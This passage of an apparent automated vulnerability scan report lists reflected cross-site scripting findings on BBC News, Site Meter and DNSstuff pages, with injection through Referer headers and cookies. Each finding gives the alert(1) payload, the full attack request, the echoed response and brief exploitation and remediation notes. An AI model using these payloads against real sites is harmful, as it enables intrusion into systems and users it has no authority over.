Expires: Mon, 18 Jul 2011 02:19:58 GMT
Connection: close
Content-Length: 66316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955598000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=d7975'-alert(1)-'27a0b2dd17b',
       section: null,
       sectionPath: '/programmes/from_our_own_correspondent',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '9538059',
       assetType: null,
       uri: '/2/hi/
...[SNIP]...

3.169. http://news.bbc.co.uk/go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 226c8'-alert(1)-'2bd0c895a29 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=226c8'-alert(1)-'2bd0c895a29

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:58 GMT
Keep-Alive: timeout=5, max=785
Expires: Mon, 18 Jul 2011 02:20:58 GMT
Connection: close
Content-Length: 66320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955658000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=226c8'-alert(1)-'2bd0c895a29',
       section: null,
       sectionPath: '/programmes/from_our_own_correspondent',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '9538059',
       assetType: null,
       uri: '/2/hi/
...[SNIP]...

3.170. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cycling/14179023.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/cycling/14179023.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dca67'-alert(1)-'0cda5dc6319 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/cycling/14179023.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=dca67'-alert(1)-'0cda5dc6319

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:39 GMT
Keep-Alive: timeout=5, max=751
Expires: Mon, 18 Jul 2011 02:20:39 GMT
Connection: close
Content-Length: 57306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955639000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=dca67'-alert(1)-'0cda5dc6319',
       section: 'cycling',
       sectionPath: '/cycling',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14179023',
       assetType: 'story',
       uri: '/sport2/hi/cycli
...[SNIP]...

3.171. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/14168601.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/football/14168601.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49552'-alert(1)-'09ddbd65199 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/football/14168601.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=49552'-alert(1)-'09ddbd65199

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:42 GMT
Keep-Alive: timeout=5, max=775
Expires: Mon, 18 Jul 2011 02:20:42 GMT
Connection: close
Content-Length: 52099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955642000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=49552'-alert(1)-'09ddbd65199',
       section: 'women',
       sectionPath: '/football',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14168601',
       assetType: 'story',
       uri: '/sport2/hi/footba
...[SNIP]...

3.172. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/golf/14178214.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/golf/14178214.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ff3c'-alert(1)-'3ebf363b53f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/golf/14178214.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2ff3c'-alert(1)-'3ebf363b53f

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:36 GMT
Keep-Alive: timeout=5, max=753
Expires: Mon, 18 Jul 2011 02:20:36 GMT
Connection: close
Content-Length: 56473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955636000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=2ff3c'-alert(1)-'3ebf363b53f',
       section: 'golf',
       sectionPath: '/golf',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14178214',
       assetType: 'story',
       uri: '/sport2/hi/golf/141782
...[SNIP]...

3.173. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/motogp/14177052.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/motogp/14177052.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8569a'-alert(1)-'1ba42694830 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/motogp/14177052.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8569a'-alert(1)-'1ba42694830

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:43 GMT
Keep-Alive: timeout=5, max=794
Expires: Mon, 18 Jul 2011 02:20:43 GMT
Connection: close
Content-Length: 53432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955643000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=8569a'-alert(1)-'1ba42694830',
       section: 'motorbikes',
       sectionPath: '/motogp',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14177052',
       assetType: 'story',
       uri: '/sport2/hi/mot
...[SNIP]...

3.174. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe938'-alert(1)-'03d0b63c54f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fe938'-alert(1)-'03d0b63c54f

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:40 GMT
Keep-Alive: timeout=5, max=776
Expires: Mon, 18 Jul 2011 02:20:40 GMT
Connection: close
Content-Length: 49436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955640000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=fe938'-alert(1)-'03d0b63c54f',
       section: 'welsh',
       sectionPath: '/rugby_union/welsh',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14175299',
       assetType: 'story',
       uri: '/sport2/
...[SNIP]...

3.175. http://news.bbc.co.uk/sport2/hi/cycling/14179023.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/cycling/14179023.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a28c'-alert(1)-'1816b6df525 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/cycling/14179023.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=3a28c'-alert(1)-'1816b6df525

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:21:06 GMT
Keep-Alive: timeout=5, max=797
Expires: Mon, 18 Jul 2011 02:21:06 GMT
Connection: close
Content-Length: 57306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955666000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=3a28c'-alert(1)-'1816b6df525',
       section: 'cycling',
       sectionPath: '/cycling',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14179023',
       assetType: 'story',
       uri: '/sport2/hi/cycli
...[SNIP]...

3.176. http://news.bbc.co.uk/sport2/hi/football/14168601.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/football/14168601.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa85e'-alert(1)-'33ab69fc437 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/football/14168601.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fa85e'-alert(1)-'33ab69fc437

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:36 GMT
Keep-Alive: timeout=5, max=773
Expires: Mon, 18 Jul 2011 02:20:36 GMT
Connection: close
Content-Length: 52023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955636000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=fa85e'-alert(1)-'33ab69fc437',
       section: 'women',
       sectionPath: '/football',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14168601',
       assetType: 'story',
       uri: '/sport2/hi/footba
...[SNIP]...

3.177. http://news.bbc.co.uk/sport2/hi/golf/14178214.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/golf/14178214.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a432b'-alert(1)-'9bd28bad69c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/golf/14178214.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a432b'-alert(1)-'9bd28bad69c

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:44 GMT
Keep-Alive: timeout=5, max=711
Expires: Mon, 18 Jul 2011 02:20:44 GMT
Connection: close
Content-Length: 55850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955644000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=a432b'-alert(1)-'9bd28bad69c',
       section: 'golf',
       sectionPath: '/golf',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14178214',
       assetType: 'story',
       uri: '/sport2/hi/golf/141782
...[SNIP]...

3.178. http://news.bbc.co.uk/sport2/hi/motogp/14177052.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/motogp/14177052.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4d7e'-alert(1)-'ec64a95f7e7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/motogp/14177052.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d4d7e'-alert(1)-'ec64a95f7e7

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:45 GMT
Keep-Alive: timeout=5, max=794
Expires: Mon, 18 Jul 2011 02:20:45 GMT
Connection: close
Content-Length: 53432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955645000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=d4d7e'-alert(1)-'ec64a95f7e7',
       section: 'motorbikes',
       sectionPath: '/motogp',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14177052',
       assetType: 'story',
       uri: '/sport2/hi/mot
...[SNIP]...

3.179. http://news.bbc.co.uk/sport2/hi/rugby_union/welsh/14175299.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/rugby_union/welsh/14175299.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f455'-alert(1)-'f2321d0a6c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/rugby_union/welsh/14175299.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4f455'-alert(1)-'f2321d0a6c

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:55 GMT
Keep-Alive: timeout=5, max=794
Expires: Mon, 18 Jul 2011 02:20:55 GMT
Connection: close
Content-Length: 49358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955655000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=4f455'-alert(1)-'f2321d0a6c',
       section: 'welsh',
       sectionPath: '/rugby_union/welsh',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14175299',
       assetType: 'story',
       uri: '/sport2/
...[SNIP]...

3.180. http://s49.sitemeter.com/js/counter.js [IP cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s49.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aea69"%3balert(1)//e28fc1d79f2 was submitted in the IP cookie. This input was echoed as aea69";alert(1)//e28fc1d79f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.js?site=s49redmondpie HTTP/1.1
Host: s49.sitemeter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/
Cookie: IP=173%2E193%2E214%2E243aea69"%3balert(1)//e28fc1d79f2

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Jul 2011 19:18:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7296
Content-Type: application/x-javascript
Expires: Mon, 18 Jul 2011 19:28:04 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.243aea69";alert(1)//e28fc1d79f2";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

3.181. http://support.dnsstuff.com/ST.ashx [siteuidut cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.dnsstuff.com
Path:   /ST.ashx

Issue detail

The value of the siteuidut cookie is copied into the HTML document as plain text between tags. The payload bef9e<script>alert(1)</script>cd0826810c8 was submitted in the siteuidut cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ST.ashx?scriptonly=true HTTP/1.1
Host: support.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://support.dnsstuff.com/Main/Default.aspx
